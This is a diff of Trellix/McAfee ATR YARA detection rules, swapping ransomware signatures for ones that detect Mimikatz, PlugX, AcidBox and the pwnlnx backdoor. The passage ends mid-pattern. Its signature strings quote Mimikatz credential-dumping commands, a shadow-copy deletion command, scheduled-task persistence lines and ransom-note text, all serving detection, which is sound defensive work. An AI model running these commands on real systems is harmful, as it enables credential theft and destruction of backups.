-		malware_family = "Ransom:Win/Babuk"
-		malware_type = "Ransom"
-		mitre_attack = "T1027, T1083, T1057, T1082, T1129, T1490, T1543.003"
+		quality = 68
+		tags = "HACKTOOL, FILE"
+		rule_version = "v1"
+		malware_type = "hacktool"
+		malware_family = "Hacktool:W32/Mimikatz"
+		actor_type = "Apt"
+		actor_group = "Unknown"
 
 	strings:
-		$s1 = {005C0048006F007700200054006F00200052006500730074006F0072006500200059006F00750072002000460069006C00650073002E007400780074}
-		$s2 = "delete shadows /all /quiet" fullword wide
-		$pattern1 = {006D656D74617300006D65706F63730000736F70686F730000766565616D0000006261636B7570000047785673730000004778426C7200000047784657440000004778435644000000477843494D67720044656657617463680000000063634576744D67720000000063635365744D677200000000536176526F616D005254567363616E0051424643536572766963650051424944505365727669636500000000496E747569742E517569636B426F6F6B732E46435300}
-		$pattern2 = {004163725363683253766300004163726F6E69734167656E74000000004341534144324457656253766300000043414152435570646174655376630000730071}
-		$pattern3 = {FFB0154000C78584FDFFFFB8154000C78588FDFFFFC0154000C7858CFDFFFFC8154000C78590FDFFFFD0154000C78594FDFFFFD8154000C78598FDFFFFE0154000C7859CFDFFFFE8154000C785A0FDFFFFF0154000C785A4FDFFFFF8154000C785A8FDFFFF00164000C785ACFDFFFF08164000C785B0FDFFFF10164000C785B4FDFFFF18164000C785B8FDFFFF20164000C785BCFDFFFF28164000C785C0FDFFFF30164000C785C4FDFFFF38164000C785C8FDFFFF40164000C785CCFDFFFF48164000C785D0FDFFFF50164000C785D4FDFFFF581640}
-		$pattern4 = {400010104000181040002010400028104000301040003810400040104000481040005010400058104000601040006C10400078104000841040008C10400094104000A0104000B0104000C8104000DC104000E8104000F01040000011400008114000181140002411400038114000501140005C11400064114000741140008C114000A8114000C0114000E0114000F4114000101240002812400034124000441240005412400064124000741240008C124000A0124000B8124000D4124000EC1240000C1340002813400054134000741340008C134000A4134000C4134000E8134000FC134000141440003C144000501440006C144000881440009C144000B4144000CC144000E8144000FC144000141540003415400048154000601540007815}
+		$s1 = "livessp.dll" fullword wide
+		$s2 = "\\system32\\tapi32.dll" fullword wide
+		$s3 = " * Process Token : " fullword wide
+		$s4 = "lsadump" fullword wide
+		$s5 = "-nl - skip lsa dump..." fullword wide
+		$s6 = "lsadump::sam" fullword wide
+		$s7 = "lsadump::lsa" fullword wide
+		$s8 = "* NL$IterCount %u, %u real iter(s)" fullword wide
+		$s9 = "* Iter to def (%d)" fullword wide
+		$s10 = " * Thread Token  : " fullword wide
+		$s11 = " * RootKey  : " fullword wide
+		$s12 = "lsadump::cache" fullword wide
+		$s13 = "sekurlsa::logonpasswords" fullword wide
+		$s14 = "(commandline) # %s" fullword wide
+		$s15 = ">>> %s of '%s' module failed : %08x" fullword wide
+		$s16 = "UndefinedLogonType" fullword wide
+		$s17 = " * Username : %wZ" fullword wide
+		$s18 = "logonPasswords" fullword wide
+		$s19 = "privilege::debug" fullword wide
+		$s20 = "token::elevate" fullword wide
+		$op0 = { e8 0b f5 00 00 90 39 35 30 c7 02 00 75 34 48 8b }
+		$op1 = { eb 34 48 8b 4d cf 48 8d 45 c7 45 33 c9 48 89 44 }
+		$op2 = { 48 3b 0d 34 26 01 00 74 05 e8 a9 31 ff ff 48 8b }
 
 	condition:
-		filesize >= 15KB and filesize <= 90KB and 1 of ( $s* ) and 3 of ( $pattern* )
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( pe.imphash ( ) == "169e02f00c6fb64587297444b6c41ff4" and all of them )
 }
-rule TRELLIX_ARC_RANSOM_Makop : RANSOMWARE FILE
+
+rule TRELLIX_ARC_Sfx_Winrar_Plugx : BUILDER FILE
 {
 	meta:
-		description = "Rule to detect the unpacked Makop ransomware samples"
+		description = "Rule to detect the SFX WinRAR delivering a possible Plugx sample"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "2828f2f9-4702-5cef-8b4e-7e98146c0332"
-		date = "2020-07-19"
+		id = "ac975a58-6a8a-515e-b27f-327a7bfc7686"
+		date = "2019-06-25"
 		modified = "2020-08-14"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_makop.yar#L1-L32"
+		reference = "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_Operation_SoftCell.yar#L260-L307"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "008e4c327875110b96deef1dd8ef65cefa201fef60ca1cbb9ab51b5304e66fe1"
-		logic_hash = "2b4f8b90d46530421b66dbb04df6e84d268709fbee884536d8acc91e1b85f8a4"
+		logic_hash = "8231f46330762cecf8a796d1a29c8fa6ba1c10b527fa86bf6c73130349558dad"
 		score = 75
-		quality = 70
-		tags = "RANSOMWARE, FILE"
+		quality = 68
+		tags = "BUILDER, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/Makop"
-		actor_type = "Cybercrime"
+		malware_type = "builder"
+		malware_family = "Builder:W32/Plugx"
+		actor_type = "Apt"
 		actor_group = "Unknown"
 
 	strings:
-		$pattern_0 = { 50 8d7c2420 e8???????? 84c0 0f84a6020000 8b742460 ba???????? }
-		$pattern_1 = { 51 52 53 ffd5 85c0 746d 8b4c240c }
-		$pattern_2 = { 7521 68000000f0 6a18 6a00 6a00 56 ff15???????? }
-		$pattern_3 = { 83c40c 8d4e0c 51 66c7060802 66c746041066 c6460820 }
-		$pattern_4 = { 51 ffd3 50 ffd7 8b4628 85c0 }
-		$pattern_5 = { 85c9 741e 8b4508 8b4d0c 8a11 }
-		$pattern_6 = { 83c002 6685c9 75f5 2bc6 d1f8 66390c46 8d3446 }
-		$pattern_7 = { 895a2c 8b7f04 85ff 0f85f7feffff 55 6a00 }
-		$pattern_8 = { 8b3d???????? 6a01 6a00 ffd7 50 ff15???????? }
-		$pattern_9 = { 85c0 7407 50 ff15???????? }
+		$s1 = "Cannot create folder %sDCRC failed in the encrypted file %s. Corrupt file or wrong password." fullword wide
+		$s2 = "Wrong password for %s5Write error in the file %s. Probably the disk is full" fullword wide
+		$s3 = "mcutil.dll" fullword ascii
+		$s4 = "Unexpected end of archiveThe file \"%s\" header is corrupt%The archive comment header is corrupt" fullword wide
+		$s5 = "mcoemcpy.exe" fullword ascii
+		$s6 = "Extracting files to %s folder$Extracting files to temporary folder" fullword wide
+		$s7 = "&Enter password for the encrypted file:" fullword wide
+		$s8 = "start \"\" \"%CD%\\mcoemcpy.exe\"" fullword ascii
+		$s9 = "setup.bat" fullword ascii
+		$s10 = "ErroraErrors encountered while performing the operation" fullword wide
+		$s11 = "Please download a fresh copy and retry the installation" fullword wide
+		$s12 = "antivir.dat" fullword ascii
+		$s13 = "The required volume is absent2The archive is either in unknown format or damaged" fullword wide
+		$s14 = "=Total path and file name length must not exceed %d characters" fullword wide
+		$s15 = "Please close all applications, reboot Windows and restart this installation\\Some installation files are corrupt." fullword wide
+		$s16 = "folder is not accessiblelSome files could not be created." fullword wide
+		$s17 = "Packed data CRC failed in %s" fullword wide
+		$s18 = "DDTTDTTDTTDTTDTTDTTDTTDTTDTQ" fullword ascii
+		$s19 = "File close error" fullword wide
+		$s20 = "CRC failed in %s" fullword wide
+		$op0 = { e8 6f 12 00 00 84 c0 74 04 32 c0 eb 34 56 ff 75 }
+		$op1 = { 53 68 b0 34 41 00 57 e8 61 44 00 00 57 e8 31 44 }
+		$op2 = { 56 ff 75 08 8d b5 f4 ef ff ff e8 17 ff ff ff 8d }
 
 	condition:
-		7 of them and filesize < 237568
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( pe.imphash ( ) == "dbb1eb5c3476069287a73206929932fd" and all of them )
 }
-rule TRELLIX_ARC_Unpacked_Shiva_Ransomware : RANSOMWARE FILE
+rule TRELLIX_ARC_APT_Acidbox_Kernelmode_Module : KERNELDRIVER FILE
 {
 	meta:
-		description = "Rule to detect an unpacked sample of Shiva ransomware"
+		description = "Rule to detect the kernel mode component of AcidBox"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "c6cd4421-216f-5c1f-bb8d-fc8ab00bb72d"
-		date = "2018-09-05"
+		id = "80b60307-5431-5f21-9e6f-06adaab0519d"
+		date = "2020-07-24"
 		modified = "2020-08-14"
-		reference = "https://twitter.com/malwrhunterteam/status/1037424962569732096"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Shiva.yar#L1-L37"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_acidbox.yar#L1-L32"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "299bebcb18e218254960ef96c2e65a4dc1945dcdfe9fc68550022f99a474f56d"
-		logic_hash = "8a6a1d9f3b75617d8f07489ecf2867f90ddcf9fbe1db1e7c0f5c26833f88be3f"
+		logic_hash = "e39da89d0da22115ac7889bc73ff183973a6c5334e304df955362bde76694d42"
 		score = 75
-		quality = 66
-		tags = "RANSOMWARE, FILE"
+		quality = 70
+		tags = "KERNELDRIVER, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/Shiva"
-		actor_type = "Cybercrime"
-		actor_group = "Unknown"
+		malware_type = "kerneldriver"
+		malware_family = "Rootkit:W32/Acidbox"
+		actor_type = "APT"
+		actor_group = "Turla"
+		hash1 = "3ef071e0327e7014dd374d96bed023e6c434df6f98cce88a1e7335a667f6749d"
 
 	strings:
-		$s1 = "c:\\Users\\sys\\Desktop\\v 0.5\\Shiva\\Shiva\\obj\\Debug\\shiva.pdb" fullword ascii
-		$s2 = "This email will be as confirmation you are ready to pay for decryption key." fullword wide
-		$s3 = "Your important files are now encrypted due to a security problem with your PC!" fullword wide
-		$s4 = "write.php?info=" fullword wide
-		$s5 = " * Do not try to decrypt your data using third party software, it may cause permanent data loss." fullword wide
-		$s6 = " * Do not rename encrypted files." fullword wide
-		$s7 = ".compositiontemplate" fullword wide
-		$s8 = "You have to pay for decryption in Bitcoins. The price depends on how fast you write to us." fullword wide
-		$s9 = "\\READ_IT.txt" fullword wide
-		$s10 = ".lastlogin" fullword wide
-		$s11 = ".logonxp" fullword wide
-		$s12 = " * Decryption of your files with the help of third parties may cause increased price" fullword wide
-		$s13 = "After payment we will send you the decryption tool that will decrypt all your files." fullword wide
+		$pattern_0 = { 897c2434 8978b8 8d5f28 448bc3 33d2 }
+		$pattern_1 = { 4c8d842470010000 488d942418010000 498bcf e8???????? 8bd8 89442460 }
+		$pattern_2 = { 4c8bf1 49d1eb 4585c9 0f88a2000000 440fb717 498bd0 }
+		$pattern_3 = { ff15???????? 4c8d9c2480000000 498b5b10 498b7318 498b7b20 4d8b7328 498be3 }
+		$pattern_4 = { 33d2 41b8???????? 895c2420 e8???????? }
+		$pattern_5 = { 895c2420 4885ff 0f8424010000 440f20c0 84c0 0f8518010000 }
+		$pattern_6 = { 85f6 0f8469fdffff 488d8424c8010000 41b9???????? }
+		$pattern_7 = { 894c2404 750a ffc7 893c24 41ffc3 ebcb 85c9 }
+		$pattern_8 = { 488b5c2450 488b742458 488b7c2460 4883c430 }
+		$pattern_9 = { 33d2 488b4c2428 e8???????? 448b842450040000 4503c0 4c8d8c2450040000 488bd7 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 800KB ) and all of them
+		7 of them and filesize < 78848
 }
-rule TRELLIX_ARC_RANSOM_Babuk_Packed_Feb2021 : RANSOM T1027_005 T1027 T1083 T1082 T1059 T1129 FILE
+rule TRELLIX_ARC_APT_Acidbox_Main_Module_Dll : BACKDOOR FILE
 {
 	meta:
-		description = "Rule to detect Babuk Locker packed"
-		author = "McAfee ATR"
-		id = "f5f3a3a6-2531-56c4-9153-b698c7bdc3d3"
-		date = "2021-02-19"
-		modified = "2021-02-24"
+		description = "Rule to detect the Main mode component of AcidBox"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "8c9beb0f-62f7-5788-8340-0b1ecdf54253"
+		date = "2020-07-24"
+		modified = "2020-08-14"
 		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Babuk_Packed_Feb2021.yar#L1-L30"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_acidbox.yar#L34-L65"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "48e0f7d87fe74a2b61c74f0d32e6a8a5"
-		logic_hash = "f3312b9c9147e9f892dbfb329cb95d3ee3ae67eefeec2d089b8c89fd26531953"
+		logic_hash = "db98e204742b8629074d47df301ffcbb2dfb977a4da91557fb50838aae79e777"
 		score = 75
 		quality = 70
-		tags = "RANSOM, T1027.005, T1027, T1083, T1082, T1059, T1129, FILE"
+		tags = "BACKDOOR, FILE"
 		rule_version = "v1"
-		malware_family = "Ransom:Win/Babuk"
-		malware_type = "Ransom"
-		mitre_attack = "T1027.005, T1027, T1083, T1082, T1059, T1129"
+		malware_type = "backdoor"
+		malware_family = "Backdoor:W32/Acidbox"
+		actor_type = "APT"
+		actor_group = "Turla"
+		hash1 = "eb30a1822bd6f503f8151cb04bfd315a62fa67dbfe1f573e6fcfd74636ecedd5"
 
 	strings:
-		$first_stage1 = { 81 ec 30 04 00 00 68 6c 49 43 00 ff 15 74 20 43 00 a3 60 4e f8 02 b8 db d9 2b 00 ba c5 62 8e 76 b9 35 11 5f 39 eb 09 8d a4 24 00 00 00 00 8b ff 89 14 24 89 4c 24 04 81 04 24 25 10 a3 3b 81 04 24 cf e0 fb 07 81 04 24 35 26 9f 42 81 04 24 65 2b 39 06 81 04 24 3c 37 33 5b 81 44 24 04 48 4f c2 5d 83 e8 01 c7 05 54 4e f8 02 00 00 00 00 75 bf 8b 0d 54 aa 43 00 53 8b 1d 58 20 43 00 55 8b 2d 60 20 43 00 56 81 c1 01 24 0a 00 57 8b 3d 50 20 43 00 89 0d 64 4e f8 02 33 f6 eb 03 8d 49 00 81 f9 fc 00 00 00 75 08 6a 00 ff 15 40 20 43 00 6a 00 ff d7 8b 0d 64 4e f8 02 81 f9 7c 0e 00 00 75 19 6a 00 ff d3 6a 00 6a 00 8d 44 24 48 50 6a 00 6a 00 ff d5 8b 0d 64 4e f8 02 81 fe e5 84 c1 09 7e 0a 81 7c 24 2c 0f 11 00 00 75 12 46 8b c6 99 83 fa 14 7c aa 7f 07 3d 30 c1 cf c7 72 a1 51 6a 00 ff 15 2c 20 43 00 8b 0d 08 a4 43 00 33 f6 a3 f4 31 f8 02 89 0d f4 07 fb 02 39 35 64 4e f8 02 76 10 8b c6 e8 56 e4 ff ff 46 3b 35 64 4e f8 02 72 f0 8b 35 80 20 43 00 bf f0 72 e9 00 8b ff 81 3d 64 4e f8 02 4d 09 00 00 75 04 6a 00 ff d6 83 ef 01 75 eb e8 d6 e3 ff ff e8 11 fe ff ff e8 0c e4 ff ff 5f 5e 5d 33 c0 5b 81 c4 30 04 00 00 c3 }
-		$first_stage2 = {81ec3??4????68????????ff??????????a3????????b8????????ba????????b9????????eb??891424894c240481????????????81????????????81????????????81????????????81????????????81??????????????83e801c7??????????????????75??8b??????????538b??????????558b??????????5681??????????578b??????????89??????????33f6eb??81??????????75??6a??ff??????????6a??ffd78b??????????81??????????75??6a??ffd36a??6a??8d442448506a??6a??ffd58b??????????81??????????7e??817c242c0f11????75??468bc69983????7c??7f??3d????????72??516a??ff??????????8b??????????33f6a3????????89??????????39??????????76??8bc6e8????????463b??????????72??8b??????????bf????????8bff81??????????????????75??6a??ffd683ef0175??e8????????e8????????e8????????5f5e5d33c05b81c43??4????c3}
-		$first_stage3 = {81ec3??4????68????????ff??????????a3????????b8????????ba????????b9????????[2-6]891424894c240481????????????81????????????81????????????81????????????81????????????81??????????????83e801c7??????????????????[2-6]8b??????????538b??????????558b??????????5681??????????578b??????????89??????????33f6[2-6]81??????????[2-6]6a??ff??????????6a??ffd78b??????????81??????????[2-6]6a??ffd36a??6a??8d442448506a??6a??ffd58b??????????81??????????[2-6]817c242c0f11????[2-6]468bc69983????[2-6][2-6]3d????????[2-6]516a??ff??????????8b??????????33f6a3????????89??????????39??????????[2-6]8bc6e8????????463b??????????[2-6]8b??????????bf????????8bff81??????????????????[2-6]6a??ffd683ef01[2-6]e8????????e8????????e8????????5f5e5d33c05b81c43??4????c3}
-		$first_stage4 = { 81 EC 30 04 00 00 68 6C 49 43 00 FF 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? B8 DB D9 2B 00 BA C5 62 8E 76 B9 35 11 5F 39 EB ?? 8D A4 24 ?? ?? ?? ?? 8B FF 89 14 24 89 4C 24 ?? 81 04 24 25 10 A3 3B 81 04 24 CF E0 FB 07 81 04 24 35 26 9F 42 81 04 24 65 2B 39 06 81 04 24 3C 37 33 5B 81 44 24 ?? 48 4F C2 5D 83 E8 01 C7 05 ?? ?? ?? ?? 00 00 00 00 75 ?? 8B 0D ?? ?? ?? ?? 53 8B 1D ?? ?? ?? ?? 55 8B 2D ?? ?? ?? ?? 56 81 C1 01 24 0A 00 57 8B 3D ?? ?? ?? ?? 89 0D ?? ?? ?? ?? 33 F6 EB ?? 8D 49 ?? 81 F9 FC 00 00 00 75 ?? 6A 00 FF 15 ?? ?? ?? ?? 6A 00 FF D7 8B 0D ?? ?? ?? ?? 81 F9 7C 0E 00 00 75 ?? 6A 00 FF D3 6A 00 6A 00 8D 44 24 ?? 50 6A 00 6A 00 FF D5 8B 0D ?? ?? ?? ?? 81 FE E5 84 C1 09 7E ?? 81 7C 24 ?? 0F 11 00 00 75 ?? 46 8B C6 99 83 FA 14 7C ?? 7F ?? 3D 30 C1 CF C7 72 ?? 51 6A 00 FF 15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 33 F6 A3 ?? ?? ?? ?? 89 0D ?? ?? ?? ?? 39 35 ?? ?? ?? ?? 76 ?? 8B C6 E8 ?? ?? ?? ?? 46 3B 35 ?? ?? ?? ?? 72 ?? 8B 35 ?? ?? ?? ?? BF F0 72 E9 00 8B FF 81 3D ?? ?? ?? ?? 4D 09 00 00 75 ?? 6A 00 FF D6 83 EF 01 75 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 5F 5E 5D 33 C0 5B 81 C4 30 04 00 00 C3}
-		$files_encryption1 = { 8a 46 02 c1 e9 02 88 47 02 83 ee 02 83 ef 02 83 f9 08 72 88 fd f3 a5 fc ff 24 95 20 81 40 00 }
-		$files_encryption2 = {8a4602c1e90288470283ee0283ef0283????72??fdf3a5fcff????????????}
-		$files_encryption3 = { 8A 46 ?? C1 E9 02 88 47 ?? 83 EE 02 83 EF 02 83 F9 08 72 ?? FD F3 A5 FC FF 24 95 ?? ?? ?? ??}
+		$pattern_0 = { 7707 b8022d03a0 eb05 e8???????? }
+		$pattern_1 = { 4403c8 8bc3 41d1c6 33c6 81c6d6c162ca c1cb02 33c7 }
+		$pattern_2 = { e9???????? 412b5c2418 8b45dc 412b442408 41015c241c 410144240c 015f1c }
+		$pattern_3 = { 48895c2408 57 4883ec30 488bfa 33db 4885c9 7479 }
+		$pattern_4 = { 48895c2408 57 4883ec30 498bd8 488bfa 488364245800 85c9 }
+		$pattern_5 = { 488987e0010000 e9???????? 81cb001003a0 e9???????? 488b87a0010000 44847806 742e }
+		$pattern_6 = { 4d8bcc 4c8d0596c50100 498bd4 488bce e8???????? 498b9de0010000 c74605aa993355 }
+		$pattern_7 = { 4533c0 8d5608 e8???????? 488bf0 4889442460 4885c0 750b }
+		$pattern_8 = { 488d5558 41c1ee08 41b802000000 44887559 e8???????? 4c8b4de0 894718 }
+		$pattern_9 = { 4d03c2 4d3bc2 4d13cc 4d0303 4d3b03 4d8903 4c8b13 }
 
 	condition:
-		filesize <= 300KB and any of ( $first_stage* ) and any of ( $files_encryption* )
+		7 of them and filesize < 550912
 }
-
-rule TRELLIX_ARC_Ransom_Mespinoza : FILE
+rule TRELLIX_ARC_APT_Acidbox_Ssp_Dll_Module : BACKDOOR FILE
 {
 	meta:
-		description = "rule to detect Mespinoza ransomware"
-		author = "Christiaan Beek @ McAfee ATR"
-		id = "70a76bc4-e0cb-5caa-bb64-1a732349d2ce"
-		date = "2020-11-24"
-		modified = "2020-11-24"
+		description = "Rule to detect the SSP DLL component of AcidBox"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "ef1511c5-f650-5e65-937c-466f00932183"
+		date = "2020-07-24"
+		modified = "2020-08-14"
 		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/Ransom_Mespinoza.yar#L3-L27"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_acidbox.yar#L67-L98"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "e245fb9a71d86209690a6f4c7aa38c10dbd32cda2ea3ecde08d0d94e896381cb"
+		logic_hash = "4c9b9de11d73587ca1ad1efa5455598e41edc5a9a59fc0339c429a212c1c7941"
 		score = 75
 		quality = 70
-		tags = "FILE"
-		malware_family = "ransom_Win_Mespinoza"
-		hash1 = "e9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead"
-		hash2 = "48355bd2a57d92e017bdada911a4b31aa7225c0b12231c9cbda6717616abaea3"
-		hash3 = "e4287e9708a73ce6a9b7a3e7c72462b01f7cc3c595d972cf2984185ac1a3a4a8"
+		tags = "BACKDOOR, FILE"
+		rule_version = "v1"
+		malware_type = "backdoor"
+		malware_family = "Backdoor:W32/Acidbox"
+		actor_type = "APT"
+		actor_group = "Turla"
+		hash1 = "003669761229d3e1db0f5a5b333ef62b3dffcc8e27c821ce9018362e0a2df7e9"
 
 	strings:
-		$s1 = "update.bat" fullword ascii
-		$s2 = "protonmail.com" fullword ascii
-		$s3 = "Every byte on any types of your devices was encrypted." fullword ascii
-		$s4 = "To get all your data back contact us:" fullword ascii
-		$s5 = "What to do to get all data back?" fullword ascii
-		$s6 = "Don't try to use backups because it were encrypted too." fullword ascii
-		$op0 = { 83 f8 4b 75 9e 0f be 46 ff 8d 4d e0 ff 34 85 50 }
-		$op1 = { c6 05 34 9b 47 00 00 e8 1f 0c 03 00 59 c3 cc cc }
-		$op2 = { e8 ef c5 fe ff b8 ff ff ff 7f eb 76 8b 4d 0c 85 }
+		$pattern_0 = { 49897ba0 8bc7 49894398 49897ba8 33c9 49894bb0 }
+		$pattern_1 = { 8b8424a8000000 c1e818 88443108 66895c310a 498b0e }
+		$pattern_2 = { 8b5f48 413bdd 410f47dd 85db 0f84f1000000 488b4720 4885c0 }
+		$pattern_3 = { e8???????? 85c0 78c7 488d9424a0020000 488d8c24e0030000 ff15???????? 4c8bf8 }
+		$pattern_4 = { ff15???????? 488bc8 4c8bc6 33d2 ff15???????? 8bfb 895c2420 }
+		$pattern_5 = { 415f c3 4c8bdc 49895b10 }
+		$pattern_6 = { 488d842488010000 4889442420 41bf???????? 458bcf 4c8bc7 418bd7 488d8c2490000000 }
+		$pattern_7 = { c1e908 0fb6c9 3bce 77b6 8bd0 b9???????? c1ea10 }
+		$pattern_8 = { 4c8bc3 ba???????? 488d4c2438 e8???????? 89442430 85c0 7508 }
+		$pattern_9 = { bb02160480 8bc3 488b5c2440 488b742448 488b7c2450 4883c430 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 600KB and pe.imphash ( ) == "b5e8bd2552848bb7bf2f28228d014742" and ( 8 of them ) and 2 of ( $op* ) ) or ( all of them )
+		7 of them and filesize < 199680
 }
-
-rule TRELLIX_ARC_Badbunny : RANSOMWARE FILE
+rule TRELLIX_ARC_Pwnlnx_Backdoor_Variant_1 : BACKDOOR FILE
 {
 	meta:
-		description = "Bad Rabbit Ransomware"
-		author = "Christiaan Beek"
-		id = "190ee396-4c26-54f7-baac-bb45e3587488"
-		date = "2017-10-24"
+		description = "Rule to detect the backdoor pwnlnx variant 1"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "5b76ca62-460c-5c36-a239-700cc509f2b0"
+		date = "2020-04-17"
 		modified = "2020-08-14"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_BadRabbit.yar#L3-L47"
+		reference = "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_decade_of_RATs.yar#L3-L33"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "2879b8dc1ca0e86253354ac24b56d950878b23215b503da9b1d5faabd2c4bf9d"
+		hash = "0f6033d6f82ce758b576e2d8c483815e908e323d0b700040fbdab5593fb5282b"
+		logic_hash = "1487890494dde891a6dbe7dff7ebd5660ee01fe10220215e680115f168c2ae4a"
 		score = 75
-		quality = 45
-		tags = "RANSOMWARE, FILE"
+		quality = 70
+		tags = "BACKDOOR, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/BadRabbit"
+		malware_type = "backdoor"
+		malware_family = "Backdoor:W32/Pwnlnx"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
-		hash1 = "8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93"
 
 	strings:
-		$x1 = "schtasks /Create /SC ONCE /TN viserion_%u /RU SYSTEM /TR \"%ws\" /ST %02d:%02d:00" fullword wide
-		$x2 = "need to do is submit the payment and get the decryption password." fullword ascii
-		$s3 = "If you have already got the password, please enter it below." fullword ascii
-		$s4 = "dispci.exe" fullword wide
-		$s5 = "\\\\.\\GLOBALROOT\\ArcName\\multi(0)disk(0)rdisk(0)partition(1)" fullword wide
-		$s6 = "Run DECRYPT app at your desktop after system boot" fullword ascii
-		$s7 = "Enter password#1: " fullword wide
-		$s8 = "Enter password#2: " fullword wide
-		$s9 = "C:\\Windows\\cscc.dat" fullword wide
-		$s10 = "schtasks /Delete /F /TN %ws" fullword wide
-		$s11 = "Password#1: " fullword ascii
-		$s12 = "\\AppData" fullword wide
-		$s13 = "Disk decryption completed" fullword wide
-		$s14 = "Files decryption completed" fullword wide
-		$s15 = "http://diskcryptor.net/" fullword wide
-		$s16 = "Your personal installation key#1:" fullword ascii
-		$s17 = ".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg." wide
-		$s18 = "Disable your anti-virus and anti-malware programs" fullword wide
-		$s19 = "bootable partition not mounted" fullword ascii
+		$bp = { 7F??4C4602??01??000000000000000002??3E????0000????1A????0000000040000000000000??????0000000000000000000040??????????????1D????????0000????????????000000000000??????4000000000??????4000000000????01??00000000????01??00000000????000000000000????0000??????0000????000000000000????4000000000000002????000000001C??0000000000001C??00000000000001??00000000000001??000005????????0000000000000000??????0000000000004000000000????76??00000000????76??000000000000????00000000????0000????0000000080????00000000????????????0000????????????000038??00000000000080??????00000000000020??0000000002??0000060000????80????0000000028??????????000028??????????0000A0????????0000????????????0000????000000000000??????000004??00001C??0000000000001C??4000000000??????4000000000????000000000000????000000000000??????00000000000050E5??6404??00009C6D0000000000009C6D4000000000??????????????0000DC??000000000000DC??00000000000004??00000000000051E5??64??000000000000000000000000000000000000000000000000000000000000000000000000000000000000????000000000000????6C69????????????2D????????78??78??362D????????6F2E32??04??000010??000001??0000474E5500000000????0000????0000????000000000000????0000??????000001??000006000000000000????000020??0000??????00007D??5A580000000000000000000000000000000000000000000000000000000015????????00000000000000000000??????00000000000082????????00000000000000000000????????????0000????????????00000000000000000000????????????0000??????000012??0000000000000000000062??0000000000006A??000012??000000000000000000001B??0000000000007E??000012??000000000000000000008B??0000000000004902??????00000000000000000000????????????0000????????????00000000000000000000????????00000000??????000012??000000000000000000008E??000000000000F401??????00000000000000000000????????????0000????????????00000000000000000000????000000000000????01??????00000000000000000000????????????0000????0000????000000000000000000000000000000000000????0000????000000000000000000000000000000000000??????000012??0000000000000000000025????????0000????????????00000000000000000000????000000000000????0000????00000000000000000000????000000000000????01??????00000000000000000000????????????0000????0000????00000000000000000000????000000000000????02??????00000000000000000000????????????0000????01??????00000000000000000000??????0000000000006602??????00000000000000000000????????????0000??????000012??0000000000000000000025????????0000????01??????00000000000000000000????000000000000????????????00000000000000000000????000000000000????01??????00000000000000000000????000000000000????0000????00000000000000000000????01??00000000????????????00000000000000000000????????????0000????????????00000000000000000000??????000000000000EC01??????00000000000000000000??????0000000000004B01??????00000000000000000000????????????0000??????000012??0000000000000000000025????????0000????01??????00000000000000000000????????????0000??????00001